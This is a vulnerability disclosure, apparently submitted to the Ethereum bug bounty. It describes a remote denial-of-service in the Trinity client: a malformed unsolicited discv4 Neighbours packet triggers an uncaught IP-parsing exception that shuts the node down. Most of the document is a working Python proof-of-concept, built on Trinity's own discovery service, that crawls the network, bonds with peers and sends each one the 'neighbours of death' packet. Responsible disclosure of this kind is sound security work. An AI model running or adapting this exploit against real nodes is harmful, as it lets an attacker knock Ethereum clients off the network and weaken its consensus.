Ethereum 1.0 - Trinity - Neighbour of Death remote DoS via DiscV4

Vulnerability Note

1 Summary

Neighbours of Death - Remote Denial-of-service via malformed DiscV4 Neighbours Entries.

An attacker may send (unsolicited) discv4 neighbour responses to trinity nodes, causing an exception forcing the node to shut down. This is a targeted one-shot attack. Being able to boot nodes off the network may be used to attack consensus (51%), however, the risk for the network is rather low as the majority of nodes is comprised of non trinity nodes.

2 Details

2.1 Description

Uncaught Exception

The trinity-eth/p2p implementation of the discovery v4 protocol attempts to process received neighbour records using the ipaddress python package. This package may throw if the received byte-sequence does not decode to a valid IP-address

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/kademlia.py#L60

class Address(AddressAPI):

    def __init__(self, ip: str, udp_port: int, tcp_port: int) -> None:
        self.udp_port = udp_port
        self.tcp_port = tcp_port
        self._ip = ipaddress.ip_address(ip)

This exception is never caught.

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/discovery.py#L1252

@to_list
def _extract_nodes_from_payload(
        sender: AddressAPI,
        payload: List[Tuple[str, bytes, bytes, bytes]],
        logger: ExtendedDebugLogger) -> Iterator[NodeAPI]:
    for item in payload:
        ip, udp_port, tcp_port, node_id = item
        address = Address.from_endpoint(ip, udp_port, tcp_port)

https://github.com/ethereum/trinity/blob/80463afcf9ea46a0a6b988ed54504d705cdf02e6/p2p/discovery.py#L827

    async def recv_neighbours_v4(self, remote: NodeAPI, payload: Sequence[Any], _: Hash32) -> None:
        # The neighbours payload should have 2 elements: nodes, expiration
        if len(payload) < 2:
            self.logger.warning('Ignoring NEIGHBOURS msg with invalid payload: %s', payload)
            return
        nodes, expiration = payload[:2]
        if self._is_msg_expired(expiration):
            return
        neighbours = _extract_nodes_from_payload(remote.address, nodes, self.logger)
        self.logger.debug2('<<< neighbours from %s: %s', remote, neighbours)

The node can, therefore, be forcefully shut down when an exception is raised.

Processing unsolicited messages

Processing unsolicited neighbour messages (or unsolicited messages at all) is problematic and violating the spec. This allows for far more attack vectors (forcing neighbours, keeping the node busy exhausting resources pot. forcing outgoing traffic (pings a.o.)) and is super dangerous.

Note: There are likely more issues in that code, especially around DDoS/Replay protection.

2.2 Proof of Concept

PoC

  1. trinity starting up
  2. waiting a couple of seconds for it to initialize
  3. launching our PoC attack in a 2nd window (not shown, but there’s not a lot of output anyway)
  4. (wait a bit) the PoC directly connects to the target (trinity) node via udp/discv4 and sends an unsolicited neighbours response containing a malformed neighbour.

Trinity does not check if it actually sent a findnode request and goes belly up when processing the malformed neighbour and shuts down. The processing of unsolicited messages is not a requirement, it would also work otherwise but this way we can immediately target nodes without having to force them to send us a findnodes request first - Note: I can provide a ready to go PoC python code if you’re interested but it is super straightforward (can easily be combined with a simple node-crawler script I wrote).

Here’s a screenshot of an invalid payload:

screenshot

Code

Add the target node to AttackDiscoveryService bootnodes and wait for it to send out messages.

from argparse import (
    ArgumentParser,
    _SubParsersAction,
)
import functools
from typing import (
    Tuple,
    Type,
)
from typing_extensions import Literal
import trio
from rlp import sedes
import async_service
from lahja import EndpointAPI
from eth_typing import BlockNumber
from eth.abc import VirtualMachineAPI
from eth.constants import GENESIS_BLOCK_NUMBER
from eth.db.backends.level import LevelDB
from eth.db.backends.memory import MemoryDB
from p2p.constants import (
    DISCOVERY_EVENTBUS_ENDPOINT,
)
from p2p.discovery import (
    PreferredNodeDiscoveryService,
    DiscoveryCommand,
    DiscoveryService,
    V4_HANDLER_TYPE,
    NodeAPI,
    Iterable, List,
    NodeID,
    keccak, sort_by_distance, trio_utils, eth_utils, to_hex,
    constants,
    Hash32, rlp, PROTO_VERSION, _get_msg_expiration, int_to_big_endian, CMD_PING, MAC_SIZE, encode_hex, HEAD_SIZE,
    CMD_NEIGHBOURS, NeighboursPacket
)

from p2p.node_db import NodeDB
from p2p.identity_schemes import default_identity_scheme_registry
from trinity.config import Eth1AppConfig
from trinity.db.eth1.header import BaseAsyncHeaderDB
from trinity.db.manager import DBClient
from trinity.db.eth1.header import TrioHeaderDB
from trinity.extensibility import (
    TrioIsolatedComponent,
)
from trinity.protocol.eth import forkid

class AttackPeerDiscoveryComponent(TrioIsolatedComponent):
    """
    Continously discover other Ethereum nodes.
    """
    name = "AttackDiscovery"
    endpoint_name = DISCOVERY_EVENTBUS_ENDPOINT

    @property
    def is_enabled(self) -> bool:
        return True

    async def do_run(self, event_bus: EndpointAPI) -> None:
        boot_info = self._boot_info
        config = boot_info.trinity_config
        config.port = 30888
        vm_config = config.get_app_config(Eth1AppConfig).get_chain_config().vm_configuration
        socket = trio.socket.socket(family=trio.socket.AF_INET, type=trio.socket.SOCK_DGRAM)
        await socket.bind(("0.0.0.0", config.port))
        base_db = MemoryDB()
        node_db = NodeDB(default_identity_scheme_registry, base_db)
        discovery_service = AttackDiscoveryService(
            config.nodekey,
            config.port,
            config.port,
            [enodeToMultiAddr("enode://a461d3765756c19eb42375c2f51a06b785dbb6197fe4f05484cd976112fa723ed6d876b8fc66a6ac5b654e38944244b13eb07ab441de708016647aee63c48c87@127.0.0.1:9000"), enodeToMultiAddr("enode://ffea312f26a0269408b9a636ba05f4322beaf41323539494e5a3d2fa9fd18cc33ba0b8588e4c4ec9ce10358c4d9f9ad06e133ff09c1f4808eec0860f486f0b27@0.0.0.0:30309")], #config.bootstrap_nodes,
            config.preferred_nodes,
            event_bus,
            socket,
            node_db
        )
        await async_service.run_trio_service(discovery_service)

class AttackDiscoveryService(PreferredNodeDiscoveryService):

    def _get_handler(self, cmd: DiscoveryCommand) -> V4_HANDLER_TYPE:
        print(cmd)
        return super()._get_handler(cmd)

    def send_neighbours_v4_of_death(self, node: NodeAPI,  neighbours: Tuple[NodeAPI, ...]=[]) -> None:

        nodes = [(b'\xff'*32, b'\xff', b'\xff', b'\xff')]
        payload = NeighboursPacket(
            neighbours=nodes,
            expiration=_get_msg_expiration())
        self.send(node, CMD_NEIGHBOURS, payload)


    async def bootstrap(self) -> None:
        while True:
            bonding_queries = []
            for node in self.bootstrap_nodes:
                uri = node.uri()
                pubkey, _, uri_tail = uri.partition('@')
                pubkey_head = pubkey[:16]
                pubkey_tail = pubkey[-8:]
                self.logger.debug("full-bootnode: %s", uri)
                self.logger.debug("bootnode: %s...%s@%s", pubkey_head, pubkey_tail, uri_tail)
                self.invalidate_bond(node.id)

                bonding_queries.append((self.bond, node.id))

            bonded = await trio_utils.gather(*bonding_queries)
            successful_bonds = len([item for item in bonded if item is True])
            if not successful_bonds:
                self.logger.warning("Failed to bond with any bootstrap nodes %s", self.bootstrap_nodes)
                continue
            else:
                self.logger.info(
                    "Bonded with %d bootstrap nodes, performing initial lookup", successful_bonds)

            while True:
                await self.lookup_random()
                print("--------------- new bootstrap round")

    async def wait_neighbours(self, remote: NodeAPI) -> Tuple[NodeAPI, ...]:
        new_neighbors = await super().wait_neighbours(remote)
        print("received (", len(new_neighbors), ") *entries* (pot. dupes) neighbours from peer", remote) # most recently added node
        print("SEND UNSOLICITED NEIGHBORS of DEATH")
        if(disarmExploit):
            self.send_neighbours_v4_of_death(remote) # disarm this
        return new_neighbors

    async def _lookup(self, target_key: bytes) -> Tuple[NodeAPI, ...]:
        if len(target_key) != constants.KADEMLIA_PUBLIC_KEY_SIZE // 8:
            raise ValueError(f"Invalid lookup target ({target_key!r}). Length is not 64")
        target_id = NodeID(keccak(target_key))
        nodes_asked: Set[NodeAPI] = set()
        nodes_seen: Set[NodeAPI] = set()

        async def _find_node(target: bytes, remote: NodeAPI) -> Tuple[NodeAPI, ...]:
            self.send_find_node_v4(remote, target)
            candidates = await self.wait_neighbours(remote)
            candidates = []
            if not candidates:
                self.logger.debug("got no candidates from %s, returning", remote)
                return tuple()
            all_candidates = tuple(c for c in candidates if c not in nodes_seen)
            candidates = tuple(
                c for c in all_candidates
                if (not self.ping_channels.already_waiting_for(c) and
                    not self.pong_channels.already_waiting_for(c))
            )
            if not candidates:
                print("no new candidates, falling back to all received candidates")
                candidates = all_candidates
            print("received (", len(candidates), ") *new* from peer", remote) # most recently added node
            print("total:", len(list(self.iter_nodes())))
            self.logger.debug2("got %s new candidates", len(candidates))
            # Ensure all received candidates are in our DB so that we can bond with them.
            self._ensure_nodes_are_in_db(candidates)
            # Add new candidates to nodes_seen so that we don't attempt to bond with failing ones
            # in the future.
            nodes_seen.update(candidates)
            bonded = await trio_utils.gather(*((self.bond, c.id) for c in candidates))
            self.logger.debug2("bonded with %s candidates", bonded.count(True))
            return tuple(c for c in candidates if bonded[candidates.index(c)])

        def _exclude_if_asked(nodes: Iterable[NodeAPI]) -> List[NodeAPI]:
            nodes_to_ask = list(set(nodes).difference(nodes_asked))
            return sort_by_distance(nodes_to_ask, target_id)[:constants.KADEMLIA_FIND_CONCURRENCY]

        closest = list(self.get_neighbours(target_id))
        self.logger.debug("starting lookup; initial neighbours: %s", closest)
        nodes_to_ask = _exclude_if_asked(closest)
        if not nodes_to_ask:
            self.logger.warning("No nodes found in routing table, can't perform lookup")
            return tuple()

        while nodes_to_ask:
            self.logger.debug2("node lookup; querying %s", nodes_to_ask)
            nodes_asked.update(nodes_to_ask)
            next_find_node_queries = (
                (_find_node, target_key, n)
                for n
                in nodes_to_ask
                if not self.neighbours_channels.already_waiting_for(n)
            )
            results = await trio_utils.gather(*next_find_node_queries)
            for candidates in results:
                closest.extend(candidates)
            # Need to sort again and pick just the closest k nodes to ensure we converge.
            closest = sort_by_distance(
                eth_utils.toolz.unique(closest), target_id)[:constants.KADEMLIA_BUCKET_SIZE]
            nodes_to_ask = _exclude_if_asked(closest)

        self.logger.debug(
            "lookup finished for target %s; closest neighbours: %s", to_hex(target_id), closest
        )
        return tuple(closest)

def main():
    import sys
    # override trinity defaults
    constants.KADEMLIA_FIND_CONCURRENCY = 1500 # basically, always ask up to 1500 in a loop
    constants.CONN_IDLE_TIMEOUT = 0.1
    constants.KADEMLIA_BUCKET_SIZE = 1024 * 8
    constants.NUM_ROUTING_TABLE_BUCKETS = 1024
    constants.KADEMLIA_IDLE_BUCKET_REFRESH_INTERVAL = 60*60*24*365 # keep 1 year?
    sys.modules["p2p.discovery.constants"] = constants
    from p2p import constants as p2p_constants
    p2p_constants.REPLY_TIMEOUT = 10
    p2p_constants.COMPLETION_TIMEOUT = 10
    p2p_constants.DEFAULT_MAX_PEERS = 10000
    p2p_constants.PEER_CONNECT_INTERVAL = 1
    p2p_constants.MAX_SEQUENTIAL_PEER_CONNECT = 10
    sys.modules["p2p.constants"] = p2p_constants # not sure if this hack really overwrite the import for other modules :thinking:
    from trinity.extensibility.component import run_trio_eth1_component
    run_trio_eth1_component(AttackPeerDiscoveryComponent)


def enodeToMultiAddr(_node):
    import urllib.parse
    import base64
    u = urllib.parse.urlparse(_node)
    pubkey =  bytearray.fromhex(u.username)
    from eth_keys import (
        keys,
    )
    xpub = keys.PublicKey(pubkey)
    from p2p.kademlia import Address, Node
    nn = Node.from_pubkey_and_addr(xpub, Address(u.hostname, u.port, u.port))
    return nn

if __name__ == "__main__":
    main()

2.3 Timeline

AUG/17/2020 - contact ethereum security team
SEP/03/2020 - confirmation

3 References

This issue was submitted to the Ethereum 1.0 Bug Bounty Program.